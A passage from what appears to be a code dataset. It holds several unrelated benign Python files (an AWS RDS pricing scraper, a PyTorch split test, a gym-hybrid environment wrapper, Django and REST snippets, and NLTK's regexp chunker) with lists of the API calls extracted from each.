django.contrib.gis import admin\n'), ((22933, 23006), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementConditionFormOfManagement', 'NameAdmin'], {}), '(LandUseAgreementConditionFormOfManagement, NameAdmin)\n', (22952, 23006), False, 'from django.contrib.gis import admin\n'), ((23007, 23076), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecisionConditionType', 'NameAdmin'], {}), '(LandUseAgreementDecisionConditionType, NameAdmin)\n', (23026, 23076), False, 'from django.contrib.gis import admin\n'), ((23077, 23153), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecision', 'LandUseAgreementDecisionAdmin'], {}), '(LandUseAgreementDecision, LandUseAgreementDecisionAdmin)\n', (23096, 23153), False, 'from django.contrib.gis import admin\n'), ((23154, 23214), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreement', 'LandUseAgreementAdmin'], {}), '(LandUseAgreement, LandUseAgreementAdmin)\n', (23173, 23214), False, 'from django.contrib.gis import admin\n'), ((4244, 4254), 'django.utils.translation.ugettext_lazy', '_', (['"""Lease"""'], {}), "('Lease')\n", (4245, 4254), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((17556, 17566), 'django.utils.translation.ugettext_lazy', '_', (['"""Lease"""'], {}), "('Lease')\n", (17557, 17566), True, 'from django.utils.translation import ugettext_lazy as _\n')]
|
#!/usr/bin/env python
import requests
import json
from json import encoder
import sys
def add_pretty_names(instances):
family_names = {
't2': 'T2 General Purpose',
'r3': 'R3 Memory Optimized',
'r4': 'R4 Memory Optimized',
'c3': 'C3 High-CPU',
'c4': 'C4 High-CPU',
'm3': 'M3 General Purpose',
'i3': 'I3 High I/O',
'cg1': 'Cluster GPU',
'cc2': 'Cluster Compute',
'cr1': 'High Memory Cluster',
'hs1': 'High Storage',
'c1' : 'C1 High-CPU',
'hi1': 'HI1. High I/O',
'm2' : 'M2 High Memory',
'm1' : 'M1 General Purpose',
'm4' : 'M4 General Purpose'
}
for k in instances:
i = instances[k]
# instance type format looks like "db.r4.large"; dropping the "db" prefix
pieces = i['instance_type'].split('.')
family = pieces[1]
short = pieces[2]
prefix = family_names.get(family, family.upper())
extra = None
if short.startswith('8x'):
extra = 'Eight'
elif short.startswith('4x'):
extra = 'Quadruple'
elif short.startswith('2x'):
extra = 'Double'
elif short.startswith('10x'):
extra = 'Deca'
elif short.startswith('x'):
extra = ''
bits = [prefix]
if extra is not None:
bits.extend([extra, 'Extra'])
short = 'Large'
bits.append(short.capitalize())
i['pretty_name'] = ' '.join([b for b in bits if b])
def scrape(output_file, input_file=None):
# if an argument is given, use that as the path for the json file
if input_file:
with open(input_file) as json_data:
data = json.load(json_data)
else:
price_index = 'https://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/AmazonRDS/current/index.json'
index = requests.get(price_index)
data = index.json()
rds_instances = {}
instances = {}
# region mapping, someone thought it was handy not to include the region id's :(
regions = {
"AWS GovCloud (US)": 'us-gov-west-1',
"Asia Pacific (Mumbai)": 'ap-south-1',
"Asia Pacific (Seoul)": 'ap-northeast-2',
"Asia Pacific (Singapore)": 'ap-southeast-1',
"Asia Pacific (Sydney)": 'ap-southeast-2',
"Asia Pacific (Tokyo)": 'ap-northeast-1',
"Asia Pacific (Osaka-Local)": 'ap-northeast-3',
"Canada (Central)": 'ca-central-1',
"EU (Frankfurt)": 'eu-central-1',
"EU (Ireland)": 'eu-west-1',
"EU (London)": 'eu-west-2',
"EU (Paris)": 'eu-west-3',
"South America (Sao Paulo)": 'sa-east-1',
"US East (N. Virginia)": 'us-east-1',
"US East (Ohio)": 'us-east-2',
"US West (N. California)": 'us-west-1',
"US West (Oregon)": 'us-west-2',
}
# loop through products, and only fetch available instances for now
for sku, product in data['products'].iteritems():
if product.get('productFamily', None) == 'Database Instance':
# map the region
try:
region = regions[product['attributes']['location']]
except KeyError as e:
if product['attributes']['location'] == 'Any':
region = 'us-east-1'
else:
raise
# set the attributes in line with the ec2 index
attributes = product['attributes']
attributes['region'] = region
attributes['memory'] = attributes['memory'].split(' ')[0]
attributes['network_performance'] = attributes['networkPerformance']
attributes['family'] = attributes['instanceFamily']
attributes['instance_type'] = attributes['instanceType']
attributes['database_engine'] = attributes['databaseEngine']
attributes['arch'] = attributes['processorArchitecture']
attributes['pricing'] = {}
attributes['pricing'][region] = {}
rds_instances[sku] = attributes
if attributes['instance_type'] not in instances.keys():
instances[attributes['instance_type']] = attributes
instances[attributes['instance_type']]['pricing'] = {}
# Parse ondemand pricing
for sku, offers in data['terms']['OnDemand'].iteritems():
for code, offer in offers.iteritems():
for key, dimension in offer['priceDimensions'].iteritems():
# skip these for now
if any(descr in dimension['description'].lower() for descr in ['transfer', 'global', 'storage', 'iops', 'requests', 'multi-az']):
continue
instance = rds_instances.get(sku)
if not instance:
print("ERROR: Instance type not found for sku={}".format(sku))
continue
if instance['region'] not in instances[instance['instance_type']]['pricing']:
instances[instance['instance_type']]['pricing'][instance['region']] = {}
instances[instance['instance_type']]['pricing'][instance['region']][instance['database_engine']] = {
'ondemand': float(dimension['pricePerUnit']['USD'])
}
reserved_mapping = {
'3yr Partial Upfront': 'yrTerm3.partialUpfront',
'1yr Partial Upfront': 'yrTerm1.partialUpfront',
'3yr All Upfront': 'yrTerm3.allUpfront',
'1yr All Upfront': 'yrTerm1.allUpfront',
'1yr No Upfront': 'yrTerm1.noUpfront'
}
# Parse reserved pricing
for sku, offers in data['terms']['Reserved'].iteritems():
for code, offer in offers.iteritems():
for key, dimension in offer['priceDimensions'].iteritems():
# skip multi-az
if rds_instances[sku]['deploymentOption'] != 'Single-AZ':
continue
instance = rds_instances[sku]
region = rds_instances[sku]['region']
# create a regional hash
if region not in instances[instance['instance_type']]['pricing']:
instances[instance['instance_type']]['pricing'][region] = {}
# create a reserved hash
if 'reserved' not in instances[instance['instance_type']]['pricing'][region][instance['database_engine']]:
instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved'] = {}
# store the pricing in placeholder field
reserved_type = "%s %s" % (offer['termAttributes']['LeaseContractLength'], offer['termAttributes']['PurchaseOption'])
instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved']['%s-%s' % (reserved_mapping[reserved_type], dimension['unit'].lower())] = float(dimension['pricePerUnit']['USD'])
# if instance['instance_type'] == 'db.m3.medium' and region == 'eu-west-1' and instance['database_engine'].lower() == 'mysql':
# print offer
# print instance['database_engine']
# print dimension
# print reserved_type
# print dimension['pricePerUnit']['USD'], float(dimension['pricePerUnit']['USD'])
# print instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved']
# print json.dumps(instances['db.m3.medium']['pricing']['eu-west-1']['MySQL'], indent=4)
# Calculate all reserved effective pricings (upfront hourly + hourly price)
for instance_type, instance in instances.iteritems():
for region, pricing in instance['pricing'].iteritems():
for engine, prices in pricing.iteritems():
if 'reserved' not in prices:
continue
try:
# no multi-az here
reserved_prices = {
'yrTerm3.partialUpfront': (prices['reserved']['yrTerm3.partialUpfront-quantity'] / (365 * 3) / 24) + prices['reserved']['yrTerm3.partialUpfront-hrs'],
'yrTerm1.partialUpfront': (prices['reserved']['yrTerm1.partialUpfront-quantity'] / 365 / 24) + prices['reserved']['yrTerm1.partialUpfront-hrs'],
'yrTerm3.allUpfront': (prices['reserved']['yrTerm3.allUpfront-quantity'] / (365 * 3) / 24) + prices['reserved']['yrTerm3.allUpfront-hrs'],
'yrTerm1.allUpfront': (prices['reserved']['yrTerm1.allUpfront-quantity'] / 365 / 24) + prices['reserved']['yrTerm1.allUpfront-hrs'],
'yrTerm1.noUpfront': prices['reserved']['yrTerm1.noUpfront-hrs'],
}
instances[instance_type]['pricing'][region][engine]['reserved'] = reserved_prices
except Exception as e:
print("ERROR: Trouble generating RDS reserved price for {}: {!r}".format(instance_type, e))
# print json.dumps(instances['db.m3.medium']['pricing']['eu-west-1']['MySQL'], indent=4)
add_pretty_names(instances)
# write output to file
encoder.FLOAT_REPR = lambda o: format(o, '.5f')
with open(output_file, 'w') as outfile:
json.dump(instances.values(), outfile, indent=4)
if __name__ == '__main__':
input_file = None
if len(sys.argv) > 1:
input_file = sys.argv[1]
output_file = './www/rds/instances.json'
scrape(output_file, input_file)
|
[
"json.load",
"requests.get"
] |
[((1897, 1922), 'requests.get', 'requests.get', (['price_index'], {}), '(price_index)\n', (1909, 1922), False, 'import requests\n'), ((1741, 1761), 'json.load', 'json.load', (['json_data'], {}), '(json_data)\n', (1750, 1761), False, 'import json\n')]
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from tests import utils
class SimpleSplitModel(torch.nn.Module):
def __init__(self, split_size_or_sections, dimension):
super(SimpleSplitModel, self).__init__()
self.split_size_or_sections = split_size_or_sections
self.dimension = dimension
def forward(self, x):
return torch.split(x, self.split_size_or_sections, self.dimension)
class TestSplit(utils.TorchGlowTestCase):
@utils.deterministic_expand(
[
lambda: (torch.randn(8), 4, 0),
lambda: (torch.randn(10), [1, 2, 3, 4], 0),
lambda: (torch.randn(10, 10, 10), 3, 2),
lambda: (torch.randn(100, 100), [25, 50, 25], 1),
lambda: (torch.randn(100, 100), [25, 50, 25], -2),
lambda: (torch.randn(100, 100), 25, -1),
]
)
def test_split(self, tensor, split_size_or_sections, dimension):
utils.compare_tracing_methods(
SimpleSplitModel(split_size_or_sections, dimension), tensor
)
|
[
"torch.split",
"torch.randn"
] |
[((410, 469), 'torch.split', 'torch.split', (['x', 'self.split_size_or_sections', 'self.dimension'], {}), '(x, self.split_size_or_sections, self.dimension)\n', (421, 469), False, 'import torch\n'), ((578, 592), 'torch.randn', 'torch.randn', (['(8)'], {}), '(8)\n', (589, 592), False, 'import torch\n'), ((622, 637), 'torch.randn', 'torch.randn', (['(10)'], {}), '(10)\n', (633, 637), False, 'import torch\n'), ((678, 701), 'torch.randn', 'torch.randn', (['(10)', '(10)', '(10)'], {}), '(10, 10, 10)\n', (689, 701), False, 'import torch\n'), ((731, 752), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (742, 752), False, 'import torch\n'), ((793, 814), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (804, 814), False, 'import torch\n'), ((856, 877), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (867, 877), False, 'import torch\n')]
|
from typing import Any, List, Dict, Union, Optional
import time
import gym
import gym_hybrid
import copy
import numpy as np
from easydict import EasyDict
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common import EnvElementInfo, affine_transform
from ding.torch_utils import to_ndarray, to_list
from ding.utils import ENV_REGISTRY
@ENV_REGISTRY.register('gym_hybrid')
class GymHybridEnv(BaseEnv):
default_env_id = ['Sliding-v0', 'Moving-v0']
def __init__(self, cfg: EasyDict) -> None:
self._cfg = cfg
self._env_id = cfg.env_id
assert self._env_id in self.default_env_id
self._act_scale = cfg.act_scale
self._init_flag = False
self._replay_path = None
def reset(self) -> np.ndarray:
if not self._init_flag:
self._env = gym.make(self._env_id)
if self._replay_path is not None:
self._env = gym.wrappers.Monitor(
self._env, self._replay_path, video_callable=lambda episode_id: True, force=True
)
self._env.metadata["render.modes"] = ["human", "rgb_array"]
self._init_flag = True
if hasattr(self, '_seed') and hasattr(self, '_dynamic_seed') and self._dynamic_seed:
np_seed = 100 * np.random.randint(1, 1000)
self._env.seed(self._seed + np_seed)
elif hasattr(self, '_seed'):
self._env.seed(self._seed)
self._final_eval_reward = 0
obs = self._env.reset()
obs = to_ndarray(obs).astype(np.float32)
return obs
def close(self) -> None:
if self._init_flag:
self._env.close()
self._init_flag = False
def seed(self, seed: int, dynamic_seed: bool = True) -> None:
self._seed = seed
self._dynamic_seed = dynamic_seed
np.random.seed(self._seed)
def step(self, action: Dict) -> BaseEnvTimestep:
if self._act_scale:
# acceleration_value.
action['action_args'][0] = affine_transform(action['action_args'][0], min_val=0, max_val=1)
# rotation_value. Following line can be omitted, because in the affine_transform function,
# we have already done the clip(-1,1) operation
action['action_args'][1] = affine_transform(action['action_args'][1], min_val=-1, max_val=1)
action = [action['action_type'], action['action_args']]
obs, rew, done, info = self._env.step(action)
self._final_eval_reward += rew
if done:
info['final_eval_reward'] = self._final_eval_reward
obs = to_ndarray(obs)
if isinstance(obs, list): # corner case
for i in range(len(obs)):
if len(obs[i].shape) == 0:
obs[i] = np.array([obs[i]])
obs = np.concatenate(obs)
assert isinstance(obs, np.ndarray) and obs.shape == (10, )
obs = obs.astype(np.float32)
rew = to_ndarray([rew]) # wrapped to be transfered to a numpy array with shape (1,)
if isinstance(rew, list):
rew = rew[0]
assert isinstance(rew, np.ndarray) and rew.shape == (1, )
info['action_args_mask'] = np.array([[1, 0], [0, 1], [0, 0]])
return BaseEnvTimestep(obs, rew, done, info)
def get_random_action(self) -> Dict:
# action_type: 0, 1, 2
# action_args:
# - acceleration_value: [0, 1]
# - rotation_value: [-1, 1]
raw_action = self._env.action_space.sample()
return {'action_type': raw_action[0], 'action_args': raw_action[1]}
def info(self) -> BaseEnvInfo:
T = EnvElementInfo
return BaseEnvInfo(
agent_num=1,
obs_space=T(
(10, ),
{
'min': -1,
'max': 2,
'dtype': np.float32,
},
),
# [min, max)
act_space=T(
(3, ),
{
'min': 0,
'max': 3,
'dtype': int,
},
),
rew_space=T(
(1, ),
{
'min': -1.0,
'max': 1.0
},
),
use_wrappers=None,
)
def __repr__(self) -> str:
return "DI-engine gym hybrid Env"
def enable_save_replay(self, replay_path: Optional[str] = None) -> None:
if replay_path is None:
replay_path = './video'
self._replay_path = replay_path
|
[
"numpy.random.seed",
"gym.make",
"ding.torch_utils.to_ndarray",
"gym.wrappers.Monitor",
"ding.envs.BaseEnvTimestep",
"numpy.random.randint",
"numpy.array",
"ding.utils.ENV_REGISTRY.register",
"numpy.concatenate",
"ding.envs.common.affine_transform"
] |
[((364, 399), 'ding.utils.ENV_REGISTRY.register', 'ENV_REGISTRY.register', (['"""gym_hybrid"""'], {}), "('gym_hybrid')\n", (385, 399), False, 'from ding.utils import ENV_REGISTRY\n'), ((1853, 1879), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (1867, 1879), True, 'import numpy as np\n'), ((2624, 2639), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['obs'], {}), '(obs)\n', (2634, 2639), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((2975, 2992), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['[rew]'], {}), '([rew])\n', (2985, 2992), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((3214, 3248), 'numpy.array', 'np.array', (['[[1, 0], [0, 1], [0, 0]]'], {}), '([[1, 0], [0, 1], [0, 0]])\n', (3222, 3248), True, 'import numpy as np\n'), ((3264, 3301), 'ding.envs.BaseEnvTimestep', 'BaseEnvTimestep', (['obs', 'rew', 'done', 'info'], {}), '(obs, rew, done, info)\n', (3279, 3301), False, 'from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo\n'), ((832, 854), 'gym.make', 'gym.make', (['self._env_id'], {}), '(self._env_id)\n', (840, 854), False, 'import gym\n'), ((2035, 2099), 'ding.envs.common.affine_transform', 'affine_transform', (["action['action_args'][0]"], {'min_val': '(0)', 'max_val': '(1)'}), "(action['action_args'][0], min_val=0, max_val=1)\n", (2051, 2099), False, 'from ding.envs.common import EnvElementInfo, affine_transform\n'), ((2302, 2367), 'ding.envs.common.affine_transform', 'affine_transform', (["action['action_args'][1]"], {'min_val': '(-1)', 'max_val': '(1)'}), "(action['action_args'][1], min_val=-1, max_val=1)\n", (2318, 2367), False, 'from ding.envs.common import EnvElementInfo, affine_transform\n'), ((2836, 2855), 'numpy.concatenate', 'np.concatenate', (['obs'], {}), '(obs)\n', (2850, 2855), True, 'import numpy as np\n'), ((929, 1035), 'gym.wrappers.Monitor', 'gym.wrappers.Monitor', (['self._env', 'self._replay_path'], {'video_callable': '(lambda episode_id: True)', 'force': '(True)'}), '(self._env, self._replay_path, video_callable=lambda\n episode_id: True, force=True)\n', (949, 1035), False, 'import gym\n'), ((1302, 1328), 'numpy.random.randint', 'np.random.randint', (['(1)', '(1000)'], {}), '(1, 1000)\n', (1319, 1328), True, 'import numpy as np\n'), ((1536, 1551), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['obs'], {}), '(obs)\n', (1546, 1551), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((2799, 2817), 'numpy.array', 'np.array', (['[obs[i]]'], {}), '([obs[i]])\n', (2807, 2817), True, 'import numpy as np\n')]
|
from django.db import models
class City(models.Model):
city_name = models.TextField()
|
[
"django.db.models.TextField"
] |
[((73, 91), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (89, 91), False, 'from django.db import models\n')]
|
from rest_framework import serializers
from apis_core.apis_vocabularies.serializers import LabelTypeMinimalSerializer
from .models import Label
class LabelSerializerLegacy(serializers.ModelSerializer):
label_type = LabelTypeMinimalSerializer()
class Meta:
model = Label
fields = ('id', 'label', 'isoCode_639_3', 'label_type')
|
[
"apis_core.apis_vocabularies.serializers.LabelTypeMinimalSerializer"
] |
[((222, 250), 'apis_core.apis_vocabularies.serializers.LabelTypeMinimalSerializer', 'LabelTypeMinimalSerializer', ([], {}), '()\n', (248, 250), False, 'from apis_core.apis_vocabularies.serializers import LabelTypeMinimalSerializer\n')]
|
# Natural Language Toolkit: Regular Expression Chunkers
#
# Copyright (C) 2001-2022 NLTK Project
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>> (minor additions)
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
import re
from nltk.chunk.api import ChunkParserI
from nltk.tree import Tree
# //////////////////////////////////////////////////////
# ChunkString
# //////////////////////////////////////////////////////
class ChunkString:
"""
A string-based encoding of a particular chunking of a text.
Internally, the ``ChunkString`` class uses a single string to
encode the chunking of the input text. This string contains a
sequence of angle-bracket delimited tags, with chunking indicated
by braces. An example of this encoding is::
{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}<.>{<DT><NN>}<VBD><.>
``ChunkString`` are created from tagged texts (i.e., lists of
``tokens`` whose type is ``TaggedType``). Initially, nothing is
chunked.
The chunking of a ``ChunkString`` can be modified with the ``xform()``
method, which uses a regular expression to transform the string
representation. These transformations should only add and remove
braces; they should *not* modify the sequence of angle-bracket
delimited tags.
:type _str: str
:ivar _str: The internal string representation of the text's
encoding. This string representation contains a sequence of
angle-bracket delimited tags, with chunking indicated by
braces. An example of this encoding is::
{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}<.>{<DT><NN>}<VBD><.>
:type _pieces: list(tagged tokens and chunks)
:ivar _pieces: The tagged tokens and chunks encoded by this ``ChunkString``.
:ivar _debug: The debug level. See the constructor docs.
:cvar IN_CHUNK_PATTERN: A zero-width regexp pattern string that
will only match positions that are in chunks.
:cvar IN_STRIP_PATTERN: A zero-width regexp pattern string that
will only match positions that are in strips.
"""
CHUNK_TAG_CHAR = r"[^\{\}<>]"
CHUNK_TAG = r"(<%s+?>)" % CHUNK_TAG_CHAR
IN_CHUNK_PATTERN = r"(?=[^\{]*\})"
IN_STRIP_PATTERN = r"(?=[^\}]*(\{|$))"
# These are used by _verify
_CHUNK = r"(\{%s+?\})+?" % CHUNK_TAG
_STRIP = r"(%s+?)+?" % CHUNK_TAG
_VALID = re.compile(r"^(\{?%s\}?)*?$" % CHUNK_TAG)
_BRACKETS = re.compile(r"[^\{\}]+")
_BALANCED_BRACKETS = re.compile(r"(\{\})*$")
def __init__(self, chunk_struct, debug_level=1):
"""
Construct a new ``ChunkString`` that encodes the chunking of
the text ``tagged_tokens``.
:type chunk_struct: Tree
:param chunk_struct: The chunk structure to be further chunked.
:type debug_level: int
:param debug_level: The level of debugging which should be
applied to transformations on the ``ChunkString``. The
valid levels are:
- 0: no checks
- 1: full check on to_chunkstruct
- 2: full check on to_chunkstruct and cursory check after
each transformation.
- 3: full check on to_chunkstruct and full check after
each transformation.
We recommend you use at least level 1. You should
probably use level 3 if you use any non-standard
subclasses of ``RegexpChunkRule``.
"""
self._root_label = chunk_struct.label()
self._pieces = chunk_struct[:]
tags = [self._tag(tok) for tok in self._pieces]
self._str = "<" + "><".join(tags) + ">"
self._debug = debug_level
def _tag(self, tok):
if isinstance(tok, tuple):
return tok[1]
elif isinstance(tok, Tree):
return tok.label()
else:
raise ValueError("chunk structures must contain tagged " "tokens or trees")
def _verify(self, s, verify_tags):
"""
Check to make sure that ``s`` still corresponds to some chunked
version of ``_pieces``.
:type verify_tags: bool
:param verify_tags: Whether the individual tags should be
checked. If this is false, ``_verify`` will check to make
sure that ``_str`` encodes a chunked version of *some*
list of tokens. If this is true, then ``_verify`` will
check to make sure that the tags in ``_str`` match those in
``_pieces``.
:raise ValueError: if the internal string representation of
this ``ChunkString`` is invalid or not consistent with _pieces.
"""
# Check overall form
if not ChunkString._VALID.match(s):
raise ValueError(
"Transformation generated invalid " "chunkstring:\n %s" % s
)
# Check that parens are balanced. If the string is long, we
# have to do this in pieces, to avoid a maximum recursion
# depth limit for regular expressions.
brackets = ChunkString._BRACKETS.sub("", s)
for i in range(1 + len(brackets) // 5000):
substr = brackets[i * 5000 : i * 5000 + 5000]
if not ChunkString._BALANCED_BRACKETS.match(substr):
raise ValueError(
"Transformation generated invalid " "chunkstring:\n %s" % s
)
if verify_tags <= 0:
return
tags1 = (re.split(r"[\{\}<>]+", s))[1:-1]
tags2 = [self._tag(piece) for piece in self._pieces]
if tags1 != tags2:
raise ValueError(
"Transformation generated invalid " "chunkstring: tag changed"
)
def to_chunkstruct(self, chunk_label="CHUNK"):
"""
Return the chunk structure encoded by this ``ChunkString``.
:rtype: Tree
:raise ValueError: If a transformation has generated an
invalid chunkstring.
"""
if self._debug > 0:
self._verify(self._str, 1)
# Use this alternating list to create the chunkstruct.
pieces = []
index = 0
piece_in_chunk = 0
for piece in re.split("[{}]", self._str):
# Find the list of tokens contained in this piece.
length = piece.count("<")
subsequence = self._pieces[index : index + length]
# Add this list of tokens to our pieces.
if piece_in_chunk:
pieces.append(Tree(chunk_label, subsequence))
else:
pieces += subsequence
# Update index, piece_in_chunk
index += length
piece_in_chunk = not piece_in_chunk
return Tree(self._root_label, pieces)
def xform(self, regexp, repl):
"""
Apply the given transformation to the string encoding of this
``ChunkString``. In particular, find all occurrences that match
``regexp``, and replace them using ``repl`` (as done by
``re.sub``).
This transformation should only add and remove braces; it
should *not* modify the sequence of angle-bracket delimited
tags. Furthermore, this transformation may not result in
improper bracketing. Note, in particular, that bracketing may
not be nested.
:type regexp: str or regexp
:param regexp: A regular expression matching the substring
that should be replaced. This will typically include a
named group, which can be used by ``repl``.
:type repl: str
:param repl: An expression specifying what should replace the
matched substring. Typically, this will include a named
replacement group, specified by ``regexp``.
:rtype: None
:raise ValueError: If this transformation generated an
invalid chunkstring.
"""
# Do the actual substitution
s = re.sub(regexp, repl, self._str)
# The substitution might have generated "empty chunks"
# (substrings of the form "{}"). Remove them, so they don't
# interfere with other transformations.
s = re.sub(r"\{\}", "", s)
# Make sure that the transformation was legal.
if self._debug > 1:
self._verify(s, self._debug - 2)
# Commit the transformation.
self._str = s
def __repr__(self):
"""
Return a string representation of this ``ChunkString``.
It has the form::
<ChunkString: '{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}'>
:rtype: str
"""
return "<ChunkString: %s>" % repr(self._str)
def __str__(self):
"""
Return a formatted representation of this ``ChunkString``.
This representation will include extra spaces to ensure that
tags will line up with the representation of other
``ChunkStrings`` for the same text, regardless of the chunking.
:rtype: str
"""
# Add spaces to make everything line up.
str = re.sub(r">(?!\})", r"> ", self._str)
str = re.sub(r"([^\{])<", r"\1 <", str)
if str[0] == "<":
str = " " + str
return str
# //////////////////////////////////////////////////////
# Chunking Rules
# //////////////////////////////////////////////////////
class RegexpChunkRule:
"""
A rule specifying how to modify the chunking in a ``ChunkString``,
using a transformational regular expression. The
``RegexpChunkRule`` class itself can be used to implement any
transformational rule based on regular expressions. There are
also a number of subclasses, which can be used to implement
simpler types of rules, based on matching regular expressions.
Each ``RegexpChunkRule`` has a regular expression and a
replacement expression. When a ``RegexpChunkRule`` is "applied"
to a ``ChunkString``, it searches the ``ChunkString`` for any
substring that matches the regular expression, and replaces it
using the replacement expression. This search/replace operation
has the same semantics as ``re.sub``.
Each ``RegexpChunkRule`` also has a description string, which
gives a short (typically less than 75 characters) description of
the purpose of the rule.
This transformation defined by this ``RegexpChunkRule`` should
only add and remove braces; it should *not* modify the sequence
of angle-bracket delimited tags. Furthermore, this transformation
may not result in nested or mismatched bracketing.
"""
def __init__(self, regexp, repl, descr):
"""
Construct a new RegexpChunkRule.
:type regexp: regexp or str
:param regexp: The regular expression for this ``RegexpChunkRule``.
When this rule is applied to a ``ChunkString``, any
substring that matches ``regexp`` will be replaced using
the replacement string ``repl``. Note that this must be a
normal regular expression, not a tag pattern.
:type repl: str
:param repl: The replacement expression for this ``RegexpChunkRule``.
When this rule is applied to a ``ChunkString``, any substring
that matches ``regexp`` will be replaced using ``repl``.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
if isinstance(regexp, str):
regexp = re.compile(regexp)
self._repl = repl
self._descr = descr
self._regexp = regexp
def apply(self, chunkstr):
# Keep docstring generic so we can inherit it.
"""
Apply this rule to the given ``ChunkString``. See the
class reference documentation for a description of what it
means to apply a rule.
:type chunkstr: ChunkString
:param chunkstr: The chunkstring to which this rule is applied.
:rtype: None
:raise ValueError: If this transformation generated an
invalid chunkstring.
"""
chunkstr.xform(self._regexp, self._repl)
def descr(self):
"""
Return a short description of the purpose and/or effect of
this rule.
:rtype: str
"""
return self._descr
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<RegexpChunkRule: '{<IN|VB.*>}'->'<IN>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<RegexpChunkRule: "
+ repr(self._regexp.pattern)
+ "->"
+ repr(self._repl)
+ ">"
)
@staticmethod
def fromstring(s):
"""
Create a RegexpChunkRule from a string description.
Currently, the following formats are supported::
{regexp} # chunk rule
}regexp{ # strip rule
regexp}{regexp # split rule
regexp{}regexp # merge rule
Where ``regexp`` is a regular expression for the rule. Any
text following the comment marker (``#``) will be used as
the rule's description:
>>> from nltk.chunk.regexp import RegexpChunkRule
>>> RegexpChunkRule.fromstring('{<DT>?<NN.*>+}')
<ChunkRule: '<DT>?<NN.*>+'>
"""
# Split off the comment (but don't split on '\#')
m = re.match(r"(?P<rule>(\\.|[^#])*)(?P<comment>#.*)?", s)
rule = m.group("rule").strip()
comment = (m.group("comment") or "")[1:].strip()
# Pattern bodies: chunk, strip, split, merge
try:
if not rule:
raise ValueError("Empty chunk pattern")
if rule[0] == "{" and rule[-1] == "}":
return ChunkRule(rule[1:-1], comment)
elif rule[0] == "}" and rule[-1] == "{":
return StripRule(rule[1:-1], comment)
elif "}{" in rule:
left, right = rule.split("}{")
return SplitRule(left, right, comment)
elif "{}" in rule:
left, right = rule.split("{}")
return MergeRule(left, right, comment)
elif re.match("[^{}]*{[^{}]*}[^{}]*", rule):
left, chunk, right = re.split("[{}]", rule)
return ChunkRuleWithContext(left, chunk, right, comment)
else:
raise ValueError("Illegal chunk pattern: %s" % rule)
except (ValueError, re.error) as e:
raise ValueError("Illegal chunk pattern: %s" % rule) from e
class ChunkRule(RegexpChunkRule):
"""
A rule specifying how to add chunks to a ``ChunkString``, using a
matching tag pattern. When applied to a ``ChunkString``, it will
find any substring that matches this tag pattern and that is not
already part of a chunk, and create a new chunk containing that
substring.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``ChunkRule``.
:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
chunk any substring that matches this tag pattern and that
is not already part of a chunk.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(
"(?P<chunk>%s)%s"
% (tag_pattern2re_pattern(tag_pattern), ChunkString.IN_STRIP_PATTERN)
)
RegexpChunkRule.__init__(self, regexp, r"{\g<chunk>}", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ChunkRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<ChunkRule: " + repr(self._pattern) + ">"
class StripRule(RegexpChunkRule):
"""
A rule specifying how to remove strips to a ``ChunkString``,
using a matching tag pattern. When applied to a
``ChunkString``, it will find any substring that matches this
tag pattern and that is contained in a chunk, and remove it
from that chunk, thus creating two new chunks.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``StripRule``.
:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
find any substring that matches this tag pattern and that
is contained in a chunk, and remove it from that chunk,
thus creating two new chunks.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(
"(?P<strip>%s)%s"
% (tag_pattern2re_pattern(tag_pattern), ChunkString.IN_CHUNK_PATTERN)
)
RegexpChunkRule.__init__(self, regexp, r"}\g<strip>{", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<StripRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<StripRule: " + repr(self._pattern) + ">"
class UnChunkRule(RegexpChunkRule):
"""
A rule specifying how to remove chunks to a ``ChunkString``,
using a matching tag pattern. When applied to a
``ChunkString``, it will find any complete chunk that matches this
tag pattern, and un-chunk it.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``UnChunkRule``.
